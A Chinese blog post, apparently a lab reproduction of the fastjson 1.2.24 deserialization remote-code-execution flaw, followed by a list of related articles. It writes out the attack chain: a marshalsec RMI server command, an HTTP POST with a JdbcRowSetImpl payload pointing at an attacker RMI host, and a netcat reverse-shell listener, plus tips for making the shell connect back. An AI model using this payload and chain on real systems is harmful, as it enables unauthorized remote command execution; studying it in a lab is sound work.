fastjson-1.2.24反序列化

最新推荐文章于 2024-04-11 17:57:36 发布
最新推荐文章于 2024-04-11 17:57:36 发布
阅读量404 收藏 1
点赞数 1
分类专栏: 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48776804/article/details/116760858
版权

fastjson-1.2.24反序列化

1 原理

fastjson是处理json数据,属于阿里巴巴开发
在传输数据的过程中发生了反序列化,以反弹shell为例,具体过程见复现步骤

2 复现过程

服务器:192.168.43.127
kali:192.168.43.149
(1)json页面的样子
192.168.43.127:8090
在这里插入图片描述
(2)json指纹,直接修改为post请求
在这里插入图片描述
(2)生成一个反弹shell的class类,并起一个临时http服务,接收shell的机器是192.168.43.149,监听1234端口
python3 -m http.server 1111
在这里插入图片描述
exploit代码图
在这里插入图片描述
exploit代码
执行javac Exploit.java ,生成class文件
在这里插入图片描述

(3)使用marshalsec-0.0.3-SNAPSHOT-all.jar起一个9999监听端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.43.149:1111/#Exploit” 9999
在这里插入图片描述

(4)使用burp发送payload,并在kali上nc -lvnp 1234,接收shell
burp截图

POST / HTTP/1.1
Host: 192.168.43.198:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 163


{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.43.149:9999/Exploit",
        "autoCommit":true
    }
}

在这里插入图片描述

在这里插入图片描述

3 易错点,不然弹不回来shell

java尽量是1.8,高版本好像无法成功
网上的文章只做参考,要有自己的判断,对于fastjson传输和处理数据的理解,很多步骤是错误的
三个文件须放在同一文件夹下(没测试是否必须这样,等待进一步测试确认),用来起一个http临时服务
payload括号要闭合,不闭合也可以
ip随便填,都能弹回来
bash反弹shell代码需要base64加密
错误示范,也不对,函数不一样,是实现的功能就不一样,具体问题具体分析,能弹回shell来的poc才是还代码,因地制宜,因时而异。
在这里插入图片描述

在这里插入图片描述
报如下错误
在这里插入图片描述

wx_7782175678
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
qq_51163834的博客
06-24 774
fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
Fastjson 1.2.24反序列化漏洞
weixin_51151498的博客
01-04 555
Fastjson 1.2.24反序列化漏洞
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
最新发布
2301_79837041的博客
04-11 1558
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。
Fastjson 1.2.24 反序列化漏洞研究
辛勤搬砖的门卫的专栏
01-05 1153
Fastjson 反序列化漏洞
【vulhub漏洞复现】Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3552
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 2974
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
fastjson-1.2.24.jar
02-24
java运行依赖jar包
fastjson-1.2.24
04-24
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
fastjson-1.2.54-API文档-中文版.zip
07-09
赠送jar包:fastjson-1.2.54.jar; 赠送原API文档:fastjson-1.2.54-javadoc.jar; 赠送源代码:fastjson-1.2.54-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.54.pom; 包含翻译后的API文档:fastjson-...
fastjson-1.2.76.jar
06-29
fastjson-1.2.76.jar
fastjson反序列化-1.2.24漏洞利用与分析
hackzkaq的博客
01-24 935
Fastjson1.2.24版本是最先发现漏洞的版本,这篇文章也是作为学习Fastjson反序列化的开端。后续会继续学习Fastjson高版本的绕过。反序列化之路任重而道远。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
[Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349)
00勇士王子的博客
03-22 5649
前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞
Fastjson 1.2.24漏洞搭建及复现——详解
网安小白的博客
08-02 824
反序列化Fastjson1.2.24漏洞复现全过程,图文详解,包含复现过程中出现各种问题~
Fastjson1.2.24 反序列化任意命令执行
weixin_45253622的博客
12-21 3736
Fastjson Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 源码地址:https://github.com/alibaba/fastjsonFastjson 中文 Wiki:https://github.com/alibaba/fastjson/wiki/Quick-Start-CN Fastjson特性:
fastjson 1.2.24 反序列化
浮生一世暖流年的博客
12-24 494
环境搭建 使用vulhub搭建环境复现漏洞 vulhub 运行命令:docker-compose up -d,访问IP:8090可以看到JSON格式的信息 漏洞复现 首先编译好恶意类 import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();
fastjson 1.2.24反序列化导致任意命令执行漏洞分析记录
爱无止
11-25 2231
环境搭建:小说搜索 shupu.org 漏洞影响版本: fastjson1.2.24以及之前版本存在远程代码执行高危安全漏洞 环境地址: https://github.com/vulhub/vulhub/tree/master/fastjson/vuln 正常访问页面返回hello,world~ 此时抓包修改content-type为json格式,并post payload,即可执...
Fastjson 1.2.24 反序列化(CVE-2017-18349)
黑白的博客
11-23 3365
声明 好好学习,天天向上 漏洞描述 CVE-2017-18349,前台无回显RCE fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 影响范围 fastjson<=1.2.24 复现过程 这里使用1.2.24版本 使用vulhub cd /app/vulhub-20201028/fastjson/1.2.24-rce 使用docker启动 docker-compose
fastjson 1.2.24/1.2.47漏洞复现
good good study
01-09 6189
当我们在渗透测试中,抓包的时候发现返回的流量内容存在json格式时,我们就可以想它是不是使用了fastjson
1.2.24 Fastjson反序列化TemplatesImpl和JdbcRowSetImpl利用链分析(非常详细)
dreamthe的博客
07-07 2114
本文的关于Fastjson1.2.24版本TemplatesImpl利用链的分析非常详细,如果你不是很熟悉该利用链,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值